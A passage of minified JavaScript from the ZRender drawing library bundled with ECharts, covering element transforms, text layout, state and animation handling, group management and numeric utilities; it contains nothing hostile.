d=n+a,f=i+s;e[4]=-d*r-h*f*o,e[5]=-f*o-p*d*r}else e[4]=e[5]=0;return e[0]=r,e[3]=o,e[1]=p*r,e[2]=h*o,l&&ke(e,e,l),e[4]+=n+u,e[5]+=i+c,e},t.initDefaultProps=((e=t.prototype).scaleX=e.scaleY=e.globalScaleRatio=1,void(e.x=e.y=e.originX=e.originY=e.skewX=e.skewY=e.rotation=e.anchorX=e.anchorY=0)),t}(),Rr=Or.getLocalTransform;function Nr(){return new Or}var Br,zr=["x","y","originX","originY","anchorX","anchorY","rotation","scaleX","scaleY","skewX","skewY"];function Er(t,e){return P(t,e,zr)}function Vr(t){Br||(Br=new Qn(100)),t=t||a;var e=Br.get(t);return e||(e={font:t,strWidthCache:new Qn(500),asciiWidthMap:null,asciiWidthMapTried:!1,stWideCharWidth:c.measureText("国",t).width,asciiCharWidth:c.measureText("a",t).width},Br.put(t,e)),e}var Fr=0,Hr=5;function Gr(t,e){return t.asciiWidthMapTried||(t.asciiWidthMap=function(t){if(!(Fr>=Hr)){t=t||a;for(var e=[],n=+new Date,i=0;i<=127;i++)e[i]=c.measureText(String.fromCharCode(i),t).width;var r=+new Date-n;return r>16?Fr=Hr:r>2&&Fr++,e}}(t.font),t.asciiWidthMapTried=!0),0<=e&&e<=127?null!=t.asciiWidthMap?t.asciiWidthMap[e]:t.asciiCharWidth:t.stWideCharWidth}function Wr(t,e){var n=t.strWidthCache,i=n.get(e);return null==i&&(i=c.measureText(e,t.font).width,n.put(e,i)),i}function Ur(t,e,n,i){var r=Wr(Vr(e),t),o=jr(e),a=Yr(0,r,n),s=Xr(0,o,i);return new Ue(a,s,r,o)}function Zr(t,e,n,i){var r=((t||"")+"").split("\n");if(1===r.length)return Ur(r[0],e,n,i);for(var o=new Ue(0,0,0,0),a=0;a<r.length;a++){var s=Ur(r[a],e,n,i);0===a?o.copy(s):o.union(s)}return o}function Yr(t,e,n,i){return"right"===n?i?t+=e:t-=e:"center"===n&&(i?t+=e/2:t-=e/2),t}function Xr(t,e,n,i){return"middle"===n?i?t+=e/2:t-=e/2:"bottom"===n&&(i?t+=e:t-=e),t}function jr(t){return Vr(t).stWideCharWidth}function qr(t,e){return"string"==typeof t?t.lastIndexOf("%")>=0?parseFloat(t)/100*e:parseFloat(t):t}function Kr(t,e,n){var i=e.position||"inside",r=null!=e.distance?e.distance:5,o=n.height,a=n.width,s=o/2,l=n.x,u=n.y,c="left",h="top";if(i instanceof Array)l+=qr(i[0],n.width),u+=qr(i[1],n.height),c=null,h=null;else switch(i){case"left":l-=r,u+=s,c="right",h="middle";break;case"right":l+=r+a,u+=s,h="middle";break;case"top":l+=a/2,u-=r,c="center",h="bottom";break;case"bottom":l+=a/2,u+=o+r,c="center";break;case"inside":l+=a/2,u+=s,c="center",h="middle";break;case"insideLeft":l+=r,u+=s,h="middle";break;case"insideRight":l+=a-r,u+=s,c="right",h="middle";break;case"insideTop":l+=a/2,u+=r,c="center";break;case"insideBottom":l+=a/2,u+=o-r,c="center",h="bottom";break;case"insideTopLeft":l+=r,u+=r;break;case"insideTopRight":l+=a-r,u+=r,c="right";break;case"insideBottomLeft":l+=r,u+=o-r,h="bottom";break;case"insideBottomRight":l+=a-r,u+=o-r,c="right",h="bottom"}return(t=t||{}).x=l,t.y=u,t.align=c,t.verticalAlign=h,t}var $r="__zr_normal__",Qr=zr.concat(["ignore"]),Jr=F(zr,function(t,e){return t[e]=!0,t},{ignore:!1}),to={},eo=new Ue(0,0,0,0),no=[],io=function(){function t(t){this.id=T(),this.animators=[],this.currentStates=[],this.states={},this._init(t)}return t.prototype._init=function(t){this.attr(t)},t.prototype.drift=function(t,e,n){switch(this.draggable){case"horizontal":e=0;break;case"vertical":t=0}var i=this.transform;i||(i=this.transform=[1,0,0,1,0,0]),i[4]+=t,i[5]+=e,this.decomposeTransform(),this.markRedraw()},t.prototype.beforeUpdate=function(){},t.prototype.afterUpdate=function(){},t.prototype.update=function(){this.updateTransform(),this.__dirty&&this.updateInnerText()},t.prototype.updateInnerText=function(t){var e=this._textContent;if(e&&(!e.ignore||t)){this.textConfig||(this.textConfig={});var n=this.textConfig,i=n.local,r=e.innerTransformable,o=void 0,a=void 0,s=!1;r.parent=i?this:null;var l=!1;r.copyTransform(e);var u=null!=n.position,c=n.autoOverflowArea,h=void 0;if((c||u)&&(h=eo,n.layoutRect?h.copy(n.layoutRect):h.copy(this.getBoundingRect()),i||h.applyTransform(this.transform)),u){this.calculateTextPosition?this.calculateTextPosition(to,n,h):Kr(to,n,h),r.x=to.x,r.y=to.y,o=to.align,a=to.verticalAlign;var p=n.origin;if(p&&null!=n.rotation){var d=void 0,f=void 0;"center"===p?(d=.5*h.width,f=.5*h.height):(d=qr(p[0],h.width),f=qr(p[1],h.height)),l=!0,r.originX=-r.x+d+(i?0:h.x),r.originY=-r.y+f+(i?0:h.y)}}null!=n.rotation&&(r.rotation=n.rotation);var g=n.offset;g&&(r.x+=g[0],r.y+=g[1],l||(r.originX=-g[0],r.originY=-g[1]));var v=this._innerTextDefaultStyle||(this._innerTextDefaultStyle={});if(c){var y=v.overflowRect=v.overflowRect||new Ue(0,0,0,0);r.getLocalTransform(no),Ie(no,no),Ue.copy(y,h),y.applyTransform(no)}else v.overflowRect=null;var m=void 0,_=void 0,x=void 0;(null==n.inside?"string"==typeof n.position&&n.position.indexOf("inside")>=0:n.inside)&&this.canBeInsideText()?(m=n.insideFill,_=n.insideStroke,null!=m&&"auto"!==m||(m=this.getInsideTextFill()),null!=_&&"auto"!==_||(_=this.getInsideTextStroke(m),x=!0)):(m=n.outsideFill,_=n.outsideStroke,null!=m&&"auto"!==m||(m=this.getOutsideFill()),null!=_&&"auto"!==_||(_=this.getOutsideStroke(m),x=!0)),(m=m||"#000")===v.fill&&_===v.stroke&&x===v.autoStroke&&o===v.align&&a===v.verticalAlign||(s=!0,v.fill=m,v.stroke=_,v.autoStroke=x,v.align=o,v.verticalAlign=a,e.setDefaultTextStyle(v)),e.__dirty|=1,s&&e.dirtyStyle(!0)}},t.prototype.canBeInsideText=function(){return!0},t.prototype.getInsideTextFill=function(){return"#fff"},t.prototype.getInsideTextStroke=function(t){return"#000"},t.prototype.getOutsideFill=function(){return this.__zr&&this.__zr.isDarkMode()?Tr:Mr},t.prototype.getOutsideStroke=function(t){var e=this.__zr&&this.__zr.getBackgroundColor(),n="string"==typeof e&&hi(e);n||(n=[255,255,255,1]);for(var i=n[3],r=this.__zr.isDarkMode(),o=0;o<3;o++)n[o]=n[o]*i+(r?0:255)*(1-i);return n[3]=1,xi(n,"rgba")},t.prototype.traverse=function(t,e){},t.prototype.attrKV=function(t,e){"textConfig"===t?this.setTextConfig(e):"textContent"===t?this.setTextContent(e):"clipPath"===t?this.setClipPath(e):"extra"===t?(this.extra=this.extra||{},A(this.extra,e)):this[t]=e},t.prototype.hide=function(){this.ignore=!0,this.markRedraw()},t.prototype.show=function(){this.ignore=!1,this.markRedraw()},t.prototype.attr=function(t,e){if("string"==typeof t)this.attrKV(t,e);else if($(t))for(var n=W(t),i=0;i<n.length;i++){var r=n[i];this.attrKV(r,t[r])}return this.markRedraw(),this},t.prototype.saveCurrentToNormalState=function(t){this._innerSaveToNormal(t);for(var e=this._normalState,n=0;n<this.animators.length;n++){var i=this.animators[n],r=i.__fromStateTransition;if(!(i.getLoop()||r&&r!==$r)){var o=i.targetName,a=o?e[o]:e;i.saveTo(a)}}},t.prototype._innerSaveToNormal=function(t){var e=this._normalState;e||(e=this._normalState={}),t.textConfig&&!e.textConfig&&(e.textConfig=this.textConfig),this._savePrimaryToNormal(t,e,Qr)},t.prototype._savePrimaryToNormal=function(t,e,n){for(var i=0;i<n.length;i++){var r=n[i];null==t[r]||r in e||(e[r]=this[r])}},t.prototype.hasState=function(){return this.currentStates.length>0},t.prototype.getState=function(t){return this.states[t]},t.prototype.ensureState=function(t){var e=this.states;return e[t]||(e[t]={}),e[t]},t.prototype.clearStates=function(t){this.useState($r,!1,t)},t.prototype.useState=function(t,e,n,i){var r=t===$r;if(this.hasState()||!r){var o=this.currentStates,a=this.stateTransition;if(!(R(o,t)>=0)||!e&&1!==o.length){var s;if(this.stateProxy&&!r&&(s=this.stateProxy(t)),s||(s=this.states&&this.states[t]),s||r){r||this.saveCurrentToNormalState(s);var l=this._textContent,u=lo(this,l,s,i);u&&!this.__inHover&&(this.__inHover=u),this._applyStateObj(t,s,this._normalState,e,co(this,n,a),a);var c=this._textGuide;return l&&l.useState(t,e,n,!!u),c&&c.useState(t,e,n,!!u),r?(this.currentStates=[],this._normalState={}):e?this.currentStates.push(t):this.currentStates=[t],this._updateAnimationTargets(),this.markRedraw(),!u&&this.__inHover&&(this.__inHover=0,this.__dirty&=-2),s}k("State "+t+" not exists.")}}},t.prototype.useStates=function(t,e,n){if(t.length){var i=[],r=this.currentStates,o=t.length,a=o===r.length;if(a)for(var s=0;s<o;s++)if(t[s]!==r[s]){a=!1;break}if(a)return;for(s=0;s<o;s++){var l=t[s],u=void 0;this.stateProxy&&(u=this.stateProxy(l,t)),u||(u=this.states[l]),u&&i.push(u)}var c=i[o-1],h=this._textContent,p=lo(this,h,c,n);p&&!this.__inHover&&(this.__inHover=p);var d=this._mergeStates(i),f=this.stateTransition;this.saveCurrentToNormalState(d),this._applyStateObj(t.join(","),d,this._normalState,!1,co(this,e,f),f);var g=this._textGuide;h&&h.useStates(t,e,!!p),g&&g.useStates(t,e,!!p),this._updateAnimationTargets(),this.currentStates=t.slice(),this.markRedraw(),!p&&this.__inHover&&(this.__inHover=0,this.__dirty&=-2)}else this.clearStates()},t.prototype.isSilent=function(){for(var t=this;t;){if(t.silent)return!0;var e=t.__hostTarget;t=e?t.ignoreHostSilent?null:e:t.parent}return!1},t.prototype._updateAnimationTargets=function(){for(var t=0;t<this.animators.length;t++){var e=this.animators[t];e.targetName&&e.changeTarget(this[e.targetName])}},t.prototype.removeState=function(t){var e=R(this.currentStates,t);if(e>=0){var n=this.currentStates.slice();n.splice(e,1),this.useStates(n)}},t.prototype.replaceState=function(t,e,n){var i=this.currentStates.slice(),r=R(i,t),o=R(i,e)>=0;r>=0?o?i.splice(r,1):i[r]=e:n&&!o&&i.push(e),this.useStates(i)},t.prototype.toggleState=function(t,e){e?this.useState(t,!0):this.removeState(t)},t.prototype._mergeStates=function(t){for(var e,n={},i=0;i<t.length;i++){var r=t[i];A(n,r),r.textConfig&&A(e=e||{},r.textConfig)}return e&&(n.textConfig=e),n},t.prototype._applyStateObj=function(t,e,n,i,r,o){if(1!==this.__inHover){var a=!(e&&i);e&&e.textConfig?(this.textConfig=A({},i?this.textConfig:n.textConfig),A(this.textConfig,e.textConfig)):a&&n.textConfig&&(this.textConfig=n.textConfig);for(var s={},l=!1,u=0;u<Qr.length;u++){var c=Qr[u],h=r&&Jr[c];e&&null!=e[c]?h?(l=!0,s[c]=e[c]):this[c]=e[c]:a&&null!=n[c]&&(h?(l=!0,s[c]=n[c]):this[c]=n[c])}if(!r)for(u=0;u<this.animators.length;u++){var p=this.animators[u],d=p.targetName;p.getLoop()||p.__changeFinalValue(d?(e||n)[d]:e||n)}l&&this._transitionState(t,s,o)}},t.prototype._attachComponent=function(t){if((!t.__zr||t.__hostTarget)&&t!==this){var e=this.__zr;e&&t.addSelfToZr(e),t.__zr=e,t.__hostTarget=this}},t.prototype._detachComponent=function(t){t.__zr&&t.removeSelfFromZr(t.__zr),t.__zr=null,t.__hostTarget=null},t.prototype.getClipPath=function(){return this._clipPath},t.prototype.setClipPath=function(t){this._clipPath&&this._clipPath!==t&&this.removeClipPath(),this._attachComponent(t),this._clipPath=t,this.markRedraw()},t.prototype.removeClipPath=function(){var t=this._clipPath;t&&(this._detachComponent(t),this._clipPath=null,this.markRedraw())},t.prototype.getTextContent=function(){return this._textContent},t.prototype.setTextContent=function(t){var e=this._textContent;e!==t&&(e&&e!==t&&this.removeTextContent(),t.innerTransformable=new Or,this._attachComponent(t),this._textContent=t,this.markRedraw())},t.prototype.setTextConfig=function(t){this.textConfig||(this.textConfig={}),A(this.textConfig,t),this.markRedraw()},t.prototype.removeTextConfig=function(){this.textConfig=null,this.markRedraw()},t.prototype.removeTextContent=function(){var t=this._textContent;t&&(t.innerTransformable=null,this._detachComponent(t),this._textContent=null,this._innerTextDefaultStyle=null,this.markRedraw())},t.prototype.getTextGuideLine=function(){return this._textGuide},t.prototype.setTextGuideLine=function(t){this._textGuide&&this._textGuide!==t&&this.removeTextGuideLine(),this._attachComponent(t),this._textGuide=t,this.markRedraw()},t.prototype.removeTextGuideLine=function(){var t=this._textGuide;t&&(this._detachComponent(t),this._textGuide=null,this.markRedraw())},t.prototype.markRedraw=function(){this.__dirty|=1;var t=this.__zr;t&&(this.__inHover?t.refreshHover():t.refresh()),this.__hostTarget&&this.__hostTarget.markRedraw()},t.prototype.dirty=function(){this.markRedraw()},t.prototype.addSelfToZr=function(t){if(this.__zr!==t){this.__zr=t;var e=this.animators;if(e)for(var n=0;n<e.length;n++)t.animation.addAnimator(e[n]);this._clipPath&&this._clipPath.addSelfToZr(t),this._textContent&&this._textContent.addSelfToZr(t),this._textGuide&&this._textGuide.addSelfToZr(t)}},t.prototype.removeSelfFromZr=function(t){if(this.__zr){this.__zr=null;var e=this.animators;if(e)for(var n=0;n<e.length;n++)t.animation.removeAnimator(e[n]);this._clipPath&&this._clipPath.removeSelfFromZr(t),this._textContent&&this._textContent.removeSelfFromZr(t),this._textGuide&&this._textGuide.removeSelfFromZr(t)}},t.prototype.animate=function(t,e,n){var i=t?this[t]:this;var r=new tr(i,e,n);return t&&(r.targetName=t),this.addAnimator(r,t),r},t.prototype.addAnimator=function(t,e){var n=this.__zr,i=this;t.during(function(){i.updateDuringAnimation(e)}).done(function(){var e=i.animators,n=R(e,t);n>=0&&e.splice(n,1)}),this.animators.push(t),n&&n.animation.addAnimator(t),n&&n.wakeUp()},t.prototype.updateDuringAnimation=function(t){this.markRedraw()},t.prototype.stopAnimation=function(t,e){for(var n=this.animators,i=n.length,r=[],o=0;o<i;o++){var a=n[o];t&&t!==a.scope?r.push(a):a.stop(e)}return this.animators=r,this},t.prototype.animateTo=function(t,e,n){ro(this,t,e,n)},t.prototype.animateFrom=function(t,e,n){ro(this,t,e,n,!0)},t.prototype._transitionState=function(t,e,n,i){for(var r=ro(this,e,n,i),o=0;o<r.length;o++)r[o].__fromStateTransition=t},t.prototype.getBoundingRect=function(){return null},t.prototype.getPaintRect=function(){return null},t.initDefaultProps=function(){var e=t.prototype;e.type="element",e.name="",e.ignore=e.silent=e.ignoreHostSilent=e.isGroup=e.draggable=e.dragging=e.ignoreClip=!1,e.__inHover=0,e.__dirty=1;function n(t,n,i,r){function o(t,e){Object.defineProperty(e,0,{get:function(){return t[i]},set:function(e){t[i]=e}}),Object.defineProperty(e,1,{get:function(){return t[r]},set:function(e){t[r]=e}})}Object.defineProperty(e,t,{get:function(){this[n]||o(this,this[n]=[]);return this[n]},set:function(t){this[i]=t[0],this[r]=t[1],this[n]=t,o(this,t)}})}Object.defineProperty&&(n("position","_legacyPos","x","y"),n("scale","_legacyScale","scaleX","scaleY"),n("origin","_legacyOrigin","originX","originY"))}(),t}();function ro(t,e,n,i,r){var o=[];so(t,"",t,e,n=n||{},i,o,r);var a=o.length,s=!1,l=n.done,u=n.aborted,c=function(){s=!0,--a<=0&&(s?l&&l():u&&u())},h=function(){--a<=0&&(s?l&&l():u&&u())};a||l&&l(),o.length>0&&n.during&&o[0].during(function(t,e){n.during(e)});for(var p=0;p<o.length;p++){var d=o[p];c&&d.done(c),h&&d.aborted(h),n.force&&d.duration(n.duration),d.start(n.easing)}return o}function oo(t,e,n){for(var i=0;i<n;i++)t[i]=e[i]}function ao(t,e,n){if(z(e[n]))if(z(t[n])||(t[n]=[]),J(e[n])){var i=e[n].length;t[n].length!==i&&(t[n]=new e[n].constructor(i),oo(t[n],e[n],i))}else{var r=e[n],o=t[n],a=r.length;if(z(r[0]))for(var s=r[0].length,l=0;l<a;l++)o[l]?oo(o[l],r[l],s):o[l]=Array.prototype.slice.call(r[l]);else oo(o,r,a);o.length=r.length}else t[n]=e[n]}function so(t,e,n,i,r,o,a,s){for(var l=W(i),u=r.duration,c=r.delay,h=r.additive,p=r.setToFinal,d=!$(o),f=t.animators,g=[],v=0;v<l.length;v++){var y=l[v],m=i[y];if(null!=m&&null!=n[y]&&(d||o[y]))if(!$(m)||z(m)||et(m))g.push(y);else{if(e){s||(n[y]=m,t.updateDuringAnimation(e));continue}so(t,y,n[y],m,r,o&&o[y],a,s)}else s||(n[y]=m,t.updateDuringAnimation(e),g.push(y))}var _=g.length;if(!h&&_)for(var x=0;x<f.length;x++){if((w=f[x]).targetName===e)if(w.stopTracks(g)){var b=R(f,w);f.splice(b,1)}}if(r.force||(g=H(g,function(t){return e=i[t],r=n[t],!(e===r||z(e)&&z(r)&&function(t,e){var n=t.length;if(n!==e.length)return!1;for(var i=0;i<n;i++)if(t[i]!==e[i])return!1;return!0}(e,r));var e,r}),_=g.length),_>0||r.force&&!a.length){var w,S=void 0,M=void 0,T=void 0;if(s){M={},p&&(S={});for(x=0;x<_;x++){M[y=g[x]]=n[y],p?S[y]=i[y]:n[y]=i[y]}}else if(p){T={};for(x=0;x<_;x++){T[y=g[x]]=ji(n[y]),ao(n,i,y)}}(w=new tr(n,!1,!1,h?H(f,function(t){return t.targetName===e}):null)).targetName=e,r.scope&&(w.scope=r.scope),p&&S&&w.whenWithKeys(0,S,g),T&&w.whenWithKeys(0,T,g),w.whenWithKeys(null==u?500:u,s?M:i,g).delay(c||0),t.addAnimator(w,e),a.push(w)}}function lo(t,e,n,i){return!(n&&n.hoverLayer||i)||uo(t)||e&&uo(e)?0:1}function uo(t){return"text"===t.type||"tspan"===t.type}function co(t,e,n){return!e&&!t.__inHover&&n&&n.duration>0}B(io,Kt),B(io,Or);var ho=function(t){function e(e){var n=t.call(this)||this;return n.isGroup=!0,n._children=[],n.attr(e),n}return n(e,t),e.prototype.childrenRef=function(){return this._children},e.prototype.children=function(){return this._children.slice()},e.prototype.childAt=function(t){return this._children[t]},e.prototype.childOfName=function(t){for(var e=this._children,n=0;n<e.length;n++)if(e[n].name===t)return e[n]},e.prototype.childCount=function(){return this._children.length},e.prototype.add=function(t){return t&&t!==this&&t.parent!==this&&(this._children.push(t),this._doAdd(t)),this},e.prototype.addBefore=function(t,e){if(t&&t!==this&&t.parent!==this&&e&&e.parent===this){var n=this._children,i=n.indexOf(e);i>=0&&(n.splice(i,0,t),this._doAdd(t))}return this},e.prototype.replace=function(t,e){var n=R(this._children,t);return n>=0&&this.replaceAt(e,n),this},e.prototype.replaceAt=function(t,e){var n=this._children,i=n[e];if(t&&t!==this&&t.parent!==this&&t!==i){n[e]=t,i.parent=null;var r=this.__zr;r&&i.removeSelfFromZr(r),this._doAdd(t)}return this},e.prototype._doAdd=function(t){t.parent&&t.parent.remove(t),t.parent=this;var e=this.__zr;e&&e!==t.__zr&&t.addSelfToZr(e),e&&e.refresh()},e.prototype.remove=function(t){var e=this.__zr,n=this._children,i=R(n,t);return i<0||(n.splice(i,1),t.parent=null,e&&t.removeSelfFromZr(e),e&&e.refresh()),this},e.prototype.removeAll=function(){for(var t=this._children,e=this.__zr,n=0;n<t.length;n++){var i=t[n];e&&i.removeSelfFromZr(e),i.parent=null}return t.length=0,this},e.prototype.eachChild=function(t,e){for(var n=this._children,i=0;i<n.length;i++){var r=n[i];t.call(e,r,i)}return this},e.prototype.traverse=function(t,e){for(var n=0;n<this._children.length;n++){var i=this._children[n],r=t.call(e,i);i.isGroup&&!r&&i.traverse(t,e)}return this},e.prototype.addSelfToZr=function(e){t.prototype.addSelfToZr.call(this,e);for(var n=0;n<this._children.length;n++){this._children[n].addSelfToZr(e)}},e.prototype.removeSelfFromZr=function(e){t.prototype.removeSelfFromZr.call(this,e);for(var n=0;n<this._children.length;n++){this._children[n].removeSelfFromZr(e)}},e.prototype.getBoundingRect=function(t){for(var e=new Ue(0,0,0,0),n=t||this._children,i=[],r=null,o=0;o<n.length;o++){var a=n[o];if(!a.ignore&&!a.invisible){var s=a.getBoundingRect(),l=a.getLocalTransform(i);l?(Ue.applyTransform(e,s,l),(r=r||e.clone()).union(e)):(r=r||s.clone()).union(s)}}return r||e},e}(io);ho.prototype.type="group";
/*!
* ZRender, a high performance 2d drawing library.
*
* Copyright (c) 2013, Baidu Inc.
* All rights reserved.
*
* LICENSE
* https://github.com/ecomfe/zrender/blob/master/LICENSE
*/
var po={},fo={};var go,vo=function(){function t(t,e,n){var i=this;this._sleepAfterStill=10,this._stillFrameAccum=0,this._needsRefresh=!0,this._needsRefreshHover=!1,this._darkMode=!1,n=n||{},this.dom=e,this.id=t;var o=new wn,a=n.renderer||"canvas";po[a]||(a=W(po)[0]),n.useDirtyRect=null!=n.useDirtyRect&&n.useDirtyRect;var s=new po[a](e,o,n,t),l=n.ssr||s.ssrOnly;this.storage=o,this.painter=s;var u,c=r.node||r.worker||l?null:new br(s.getViewportRoot(),s.root),h=n.useCoarsePointer;(null==h||"auto"===h?r.touchEventsSupported:!!h)&&(u=at(n.pointerSize,44)),this.handler=new un(o,s,c,s.root,u),this.animation=new rr({stage:{update:l?null:function(){return i._flush(!1)}}}),l||this.animation.start()}return t.prototype.add=function(t){!this._disposed&&t&&(this.storage.addRoot(t),t.addSelfToZr(this),this.refresh())},t.prototype.remove=function(t){!this._disposed&&t&&(this.storage.delRoot(t),t.removeSelfFromZr(this),this.refresh())},t.prototype.configLayer=function(t,e){this._disposed||(this.painter.configLayer&&this.painter.configLayer(t,e),this.refresh())},t.prototype.setBackgroundColor=function(t){this._disposed||(this.painter.setBackgroundColor&&this.painter.setBackgroundColor(t),this.refresh(),this._backgroundColor=t,this._darkMode=function(t){if(!t)return!1;if("string"==typeof t)return bi(t,1)<.4;if(t.colorStops){for(var e=t.colorStops,n=0,i=e.length,r=0;r<i;r++)n+=bi(e[r].color,1);return(n/=i)<.4}return!1}(t))},t.prototype.getBackgroundColor=function(){return this._backgroundColor},t.prototype.setDarkMode=function(t){this._darkMode=t},t.prototype.isDarkMode=function(){return this._darkMode},t.prototype.refreshImmediately=function(t){this._disposed||this._refresh({animUpdate:!t,refresh:!0,refreshHover:!1})},t.prototype._refresh=function(t){t.animUpdate&&this.animation.update(!0),this._needsRefresh=this._needsRefreshHover=!1,this.painter.refresh({refresh:t.refresh,refreshHover:t.refreshHover}),this._needsRefresh=this._needsRefreshHover=!1},t.prototype.refresh=function(){this._disposed||(this._needsRefresh=!0,this.animation.start())},t.prototype.flush=function(){this._disposed||this._flush(!0)},t.prototype._flush=function(t){var e,n=er(),i=this._needsRefresh,r=this._needsRefreshHover;(i||r)&&(e=!0,this._refresh({animUpdate:t,refresh:i,refreshHover:r}));var o=er();e?(this._stillFrameAccum=0,this.trigger("rendered",{elapsedTime:o-n})):this._sleepAfterStill>0&&(this._stillFrameAccum++,this._stillFrameAccum>this._sleepAfterStill&&this.animation.stop())},t.prototype.setSleepAfterStill=function(t){this._sleepAfterStill=t},t.prototype.wakeUp=function(){this._disposed||(this.animation.start(),this._stillFrameAccum=0)},t.prototype.refreshHover=function(){this._needsRefreshHover=!0},t.prototype.refreshHoverImmediately=function(){this._disposed||this._refresh({animUpdate:!1,refresh:!1,refreshHover:!0})},t.prototype.resize=function(t){this._disposed||(t=t||{},this.painter.resize(t.width,t.height),this.handler.resize())},t.prototype.clearAnimation=function(){this._disposed||this.animation.clear()},t.prototype.getWidth=function(){if(!this._disposed)return this.painter.getWidth()},t.prototype.getHeight=function(){if(!this._disposed)return this.painter.getHeight()},t.prototype.setCursorStyle=function(t){this._disposed||this.handler.setCursorStyle(t)},t.prototype.findHover=function(t,e){if(!this._disposed)return this.handler.findHover(t,e)},t.prototype.on=function(t,e,n){return this._disposed||this.handler.on(t,e,n),this},t.prototype.off=function(t,e){this._disposed||this.handler.off(t,e)},t.prototype.trigger=function(t,e){this._disposed||this.handler.trigger(t,e)},t.prototype.clear=function(){if(!this._disposed){for(var t=this.storage.getRoots(),e=0;e<t.length;e++)t[e]instanceof ho&&t[e].removeSelfFromZr(this);this.storage.delAllRoots(),this.painter.clear()}},t.prototype.dispose=function(){var t;this._disposed||(this.animation.stop(),this.clear(),this.storage.dispose(),this.painter.dispose(),this.handler.dispose(),this.animation=this.storage=this.painter=this.handler=null,this._disposed=!0,t=this.id,delete fo[t])},t}();function yo(t,e){var n=new vo(T(),t,e);return fo[n.id]=n,n}function mo(t,e){po[t]=e}function _o(t){if("function"==typeof go)return go(t)}function xo(t){go=t}var bo=Object.freeze({__proto__:null,init:yo,dispose:function(t){t.dispose()},disposeAll:function(){for(var t in fo)fo.hasOwnProperty(t)&&fo[t].dispose();fo={}},getInstance:function(t){return fo[t]},registerPainter:mo,getElementSSRData:_o,registerSSRDataGetter:xo,version:"6.1.0"}),wo=1e-4;var So=Math.min,Mo=Math.max,To=Math.abs,ko=Math.round,Co=Math.floor,Io=Math.ceil,Do=Math.pow,Ao=Math.log,Po=Math.LN10,Lo=Math.PI,Oo=Math.random;function Ro(t,e,n,i){var r=e[0],o=e[1],a=n[0],s=n[1],l=o-r,u=s-a;if(0===l)return 0===u?a:(a+s)/2;if(i)if(l>0){if(t<=r)return a;if(t>=o)return s}else{if(t>=r)return a;if(t<=o)return s}else{if(t===r)return a;if(t===o)return s}return(t-r)/l*u+a}var No=function(t,e,n){switch(t){case"center":case"middle":t="50%";break;case"left":case"top":t="0%";break;case"right":case"bottom":t="100%"}return Bo(t,e,n)};function Bo(t,e,n){return j(t)?function(t){return!!(e=t,e.replace(/^\s+|\s+$/g,"")).match(/%$/);var e}(t)?parseFloat(t)/100*e+(n||0):parseFloat(t):null==t?NaN:+t}function zo(t,e,n){return isNaN(e)?n?""+t:+t:(e=So(Mo(0,e),20),t=(+t).toFixed(e),n?t:+t)}function Eo(t){return t.sort(function(t,e){return t-e}),t}function Vo(t){if(t=+t,isNaN(t))return 0;if(t>1e-14)for(var e=1,n=0;n<15;n++,e*=10)if(ko(t*e)/e===t)return n;return Fo(t)}function Fo(t){var e=t.toString().toLowerCase(),n=e.indexOf("e"),i=n>0?+e.slice(n+1):0,r=n>0?n:e.length,o=e.indexOf(".");return Mo(0,(o<0?0:r-1-o)-i)}function Ho(t,e,n){var i=To(t[1]-t[0]);if(!isFinite(i)||0===i)return NaN;var r=Ao(2*To(n||1)*To(i))/Po,o=Ao(To(e))/Po,a=Mo(0,Io(-r+o));return isFinite(a)||(a=NaN),a}function Go(t,e){var n=F(t,function(t,e){return t+(isNaN(e)?0:e)},0);if(0===n)return[];for(var i=Do(10,e),r=V(t,function(t){return(isNaN(t)?0:t)/n*i*100}),o=100*i,a=V(r,function(t){return Co(t)}),s=F(a,function(t,e){return t+e},0),l=V(r,function(t,e){return t-a[e]});s<o;){for(var u=Number.NEGATIVE_INFINITY,c=null,h=0,p=l.length;h<p;++h)l[h]>u&&(u=l[h],c=h);++a[c],l[c]=0,++s}return V(a,function(t){return t/i})}function Wo(t,e){var n=Mo(Vo(t),Vo(e)),i=t+e;return n>20?i:zo(i,n)}var Uo=Do(2,53)-1;function Zo(t){var e=2*Lo;return(t%e+e)%e}function Yo(t){return t>-1e-4&&t<wo}var Xo=/^(?:(\d{4})(?:[-\/](\d{1,2})(?:[-\/](\d{1,2})(?:[T ](\d{1,2})(?::(\d{1,2})(?::(\d{1,2})(?:[.,](\d+))?)?)?(Z|[\+\-]\d\d:?\d\d)?)?)?)?)?$/;function jo(t){if(t instanceof Date)return t;if(j(t)){var e=Xo.exec(t);if(!e)return new Date(NaN);if(e[8]){var n=+e[4]||0;return"Z"!==e[8].toUpperCase()&&(n-=+e[8].slice(0,3)),new Date(Date.UTC(+e[1],+(e[2]||1)-1,+e[3]||1,n,+(e[5]||0),+e[6]||0,e[7]?+e[7].substring(0,3):0))}return new Date(+e[1],+(e[2]||1)-1,+e[3]||1,+e[4]||0,+(e[5]||0),+e[6]||0,e[7]?+e[7].substring(0,3):0)}return null==t?new Date(NaN):new Date(ko(t))}function qo(t){return Do(10,Ko(t))}function Ko(t){if(0===t)return 0;var e=Co(Ao(t)/Po);return t/Do(10,e)>=10&&e++,e}function $o(t,e){var n=Ko(t),i=Do(10,n),r=t/i;return zo(t=(2===e?1:e?r<1.5?1:r<2.5?2:r<4?3:r<7?5:10:r<1?1:r<2?2:r<3?3:r<5?5:10)*i,-n)}function Qo(t){var e=parseFloat(t);return e==t&&(0!==e||!j(t)||t.indexOf("x")<=0)?e:NaN}function Jo(t){return!isNaN(Qo(t))}function ta(){return ko(9*Oo())}function ea(t,e){return 0===e?t:ea(e,t%e)}function na(t,e){return null==t?e:null==e?t:t*e/ea(t,e)}function ia(t){return null!=t&&isFinite(t)}var ra={},oa="undefined"!=typeof console&&console.warn&&console.log;function aa(t,e,n){if(oa){if(n){if(ra[e])return;ra[e]=!0}console[t]("[ECharts] "+e)}}function sa(t,e){aa("error",t,e)}function la(t){0}function ua(t){throw new Error(t)}function ca(t,e,n){return(e-t)*n+t}var ha="series\0",pa="\0_ec_\0";function da(t){return t instanceof Array?t:null==t?[]:[t]}function fa(t,e,n){if(t){t[e]=t[e]||{},t.emphasis=t.emphasis||{},t.emphasis[e]=t.emphasis[e]||{};for(var i=0,r=n.length;i<r;i++){var o=n[i];!t.emphasis[e].hasOwnProperty(o)&&t[e].hasOwnProperty(o)&&(t.emphasis[e][o]=t[e][o])}}}var 